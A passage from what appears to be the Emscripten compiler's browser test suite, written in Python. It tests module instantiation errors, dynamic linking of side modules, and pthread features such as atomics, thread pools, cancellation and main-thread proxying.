<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message);
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?Aborted(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = test_file('browser/test_modularize_init_error.cpp')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_cpp_path, '-sMODULARIZE', '-sEXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# Test illustrating the regression in the modularize feature introduced in commit c5af8f6
# when compiling with the --preload-file option.
def test_modularize_and_preload_files(self):
self.set_setting('EXIT_RUNTIME')
# TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0
self.ldflags.remove('-sCLOSURE_WARNINGS=error')
# use an amount of memory for the emscripten heap that differs from the default
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
return 0;
}
''' % totalMemory)
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-sWASM=0', '-sMODULARIZE', '-sEXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts, reporting=Reporting.JS_ONLY)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?exit:0')
def test_webidl(self):
# see original in test_core.py
self.run_process([WEBIDL_BINDER, test_file('webidl/test.idl'), 'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(Path('webidl/test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_file('main.c', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
return 0;
}
''')
create_file('side.c', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', 'side.wasm'])
print('wasm in worker (we can read binary data synchronously there)')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '--proxy-to-worker', 'side.wasm'])
print('wasm (will auto-preload since no sync binary reading)')
# same wasm side module works
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '-sEXPORT_ALL', 'side.wasm'])
def test_dlopen_async(self):
create_file('side.c', 'int foo = 42;\n')
self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-sSIDE_MODULE'])
self.btest_exit(test_file('other/test_dlopen_async.c'), args=['-sMAIN_MODULE=2'])
def test_dlopen_blocking(self):
create_file('side.c', 'int foo = 42;\n')
self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-sSIDE_MODULE', '-sUSE_PTHREADS', '-Wno-experimental'])
# Attempting to dlopen the side module (without preloading) should fail on the main thread
# since the synchronous `readBinary` function does not exist.
self.btest_exit(test_file('other/test_dlopen_blocking.c'), assert_returncode=1, args=['-sMAIN_MODULE=2'])
# But with PROXY_TO_PTHREAD it does work, since we can do blocking and sync XHR in a worker.
self.btest_exit(test_file('other/test_dlopen_blocking.c'), args=['-sMAIN_MODULE=2', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-Wno-experimental'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output, emcc_args=[]):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'] + emcc_args)
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_file('main.c', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
return 0;
}
''')
create_file('side.c', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '-sLEGACY_GL_EMULATION', '-lSDL', '-lGL', 'side.wasm'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_file('main.c', r'''
#include <assert.h>
int side1();
int side2();
int main() {
assert(side1() == 1);
assert(side2() == 2);
return 0;
}
''')
create_file('side1.c', r'''
int side1() { return 1; }
''')
create_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-sSIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-sSIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# refer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_file('main.cpp', r'''
#include <cassert>
#include <thread>
#include <emscripten/emscripten.h>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
assert(side1_ptr == &side1);
assert(side2_ptr == &side2);
emscripten_force_exit(0);
}).detach();
emscripten_exit_with_live_runtime();
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-sSIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-sSIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.cpp'),
args=['-Wno-experimental', '-pthread', '-sMAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])
def test_memory_growth_during_startup(self):
create_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-sASSERTIONS', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=16MB', '-sTOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_file('html.html', read_file(path_from_root('src/shell_minimal.html')).replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
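# A minimal, hypothetical usage sketch (not one of the original tests) for the
# prep_no_SAB() helper above: build a plain, non-pthread program against the
# generated shell and check that it still runs when SharedArrayBuffer and
# Atomics are unavailable.
def test_no_sab_sketch(self):
  self.prep_no_SAB()
  self.btest('browser_test_hello_world.c', expected='0',
             args=['--shell-file', 'html.html'])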
@requires_threads
def test_pthread_c11_threads(self):
self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
args=['-gsource-map', '-std=gnu11', '-xc', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sTOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_pool_size_strict(self):
# Check that it doesn't fail with a sufficient number of threads in the pool.
self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-sPTHREAD_POOL_SIZE=4', '-sPTHREAD_POOL_SIZE_STRICT=2', '-sTOTAL_MEMORY=64mb'])
# Check that it fails instead of deadlocking with an insufficient number of threads in the pool.
self.btest(test_file('pthread/test_pthread_c11_threads.c'),
expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-sPTHREAD_POOL_SIZE=3', '-sPTHREAD_POOL_SIZE_STRICT=2', '-sTOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
# Check that it fails when there's a pthread creating another pthread.
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-sPTHREAD_POOL_SIZE=2', '-sPTHREAD_POOL_SIZE_STRICT=2'])
# Check that it fails when there's a pthread creating another pthread.
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-sPTHREAD_POOL_SIZE=1', '-sPTHREAD_POOL_SIZE_STRICT=2', '-DSMALL_POOL'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest_exit(test_file('pthread/test_pthread_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest_exit(test_file('pthread/test_pthread_64bit_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@parameterized({
'': ([],),
'O3': (['-O3'],)
})
@requires_threads
def test_pthread_64bit_cxx11_atomics(self, opt):
for pthreads in [[], ['-sUSE_PTHREADS']]:
self.btest_exit(test_file('pthread/test_pthread_64bit_cxx11_atomics.cpp'), args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest_exit(test_file('pthread/test_pthread_hardware_concurrency.cpp'), args=['-O2', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread/main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-sUSE_PTHREADS', '-g', '-DTRY_JOIN', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sPROXY_TO_PTHREAD', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_fetch_and_op.cpp'), args=args + ['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
if not self.is_wasm():
self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_op_and_fetch.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
if not self.is_wasm():
self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed', '--profiling-funcs']
self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), args=['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-O2', '-sPTHREAD_POOL_SIZE=8'])
# Tests the remaining GCC atomics beyond the two tests above.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest_exit(test_file('pthread/test_pthread_gcc_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest_exit(test_file('pthread/test_pthread_gcc_spinlock.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest_exit(test_file('pthread/test_pthread_create.cpp'),
args=['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figured out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-sMINIMAL_RUNTIME'])
# Test that preallocating worker threads works.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest_exit(test_file('pthread/test_pthread_preallocates_workers.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=4', '-sPTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest_exit(test_file('pthread/test_large_pthread_allocation.cpp'), args=['-sINITIAL_MEMORY=128MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -sPROXY_TO_PTHREAD option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest_exit(test_file('pthread/test_pthread_proxy_to_pthread.c'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest_exit(test_file('pthread/test_pthread_nested_spawns.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest_exit(test_file('pthread/test_pthread_join.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest_exit(test_file('pthread/test_std_thread_detach.cpp'), args=['-sUSE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest_exit(test_file('pthread/test_pthread_cancel.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
self.btest_exit(test_file('pthread/test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-sUSE_PTHREADS=1', '-sPTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest_exit(test_file('pthread/test_pthread_kill.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest_exit(test_file('pthread/test_pthread_cleanup.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest_exit(test_file('pthread/test_pthread_mutex.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest_exit(test_file('pthread/test_pthread_attr_getstack.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest_exit(test_file('pthread/test_pthread_malloc.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call sbrk(), where the main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest_exit(test_file('pthread/test_pthread_malloc_free.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sINITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest_exit(test_file('pthread/test_pthread_barrier.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest_exit(test_file('pthread/test_pthread_once.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest_exit(test_file('pthread/test_pthread_spawns.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '--closure=1', '-sENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest_exit(test_file('pthread/test_pthread_volatile.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest_exit(test_file('pthread/test_pthread_thread_local_storage.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest_exit(test_file('pthread/test_pthread_condition_variable.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest_exit(test_file('pthread/test_pthread_printf.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sLIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest_exit(test_file('pthread/test_pthread_iostream.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(test_file('unistd/io.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sWASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@also_with_wasm2js
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest_exit(test_file('pthread/test_pthread_setspecific_mainthread.c'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS'])
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest_exit(test_file('pthread/test_pthread_file_io.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']]:
self.btest_exit(test_file('pthread/test_pthread_supported.cpp'), args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(test_file('pthread/test_pthread_dispatch_after_exit.c'), args=['-sUSE_PTHREADS'])
# Test that the Module.locateFile hook can be used to control where the pthread worker.js file is loaded from.
@requires_threads
def test_pthread_custom_pthread_main_url(self):
self.set_setting('EXIT_RUNTIME')
ensure_dir('cdn')
create_file('main.cpp', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
_Atomic int result = 0;
void *thread_main(void *arg) {
result = 1;
pthread_exit(0);
}
int main() {
pthread_t t;
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
assert(result == 1);
return 0;
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-sWASM=0', '-sIN_TEST_HARNESS', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
shutil.move('test.worker.js', Path('cdn/test.worker.js'))
if os.path.exists('test.html.mem'):
shutil.copyfile('test.html.mem', Path('cdn/test.html.mem'))
self.run_browser('test.html', '', '/report_result?exit:0')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-sWASM=0', '-sIN_TEST_HARNESS', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-o', 'test2.html'], reporting=Reporting.JS_ONLY)
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?exit:0')
# Test that there is no deadlock when the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread).
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest_exit(test_file('pthread/test_pthread_proxying_in_futex_wait.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest_exit(test_file('pthread/test_pthread_sbrk.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-sINITIAL_MEMORY=128MB'])
# Test that -sABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-sUSE_PTHREADS']]:
self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-sABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread_flood.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest_exit(test_file('pthread/call_async.c'), args=['-sUSE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-sUSE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js'), '-sEXPORTED_FUNCTIONS=_main,_malloc'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
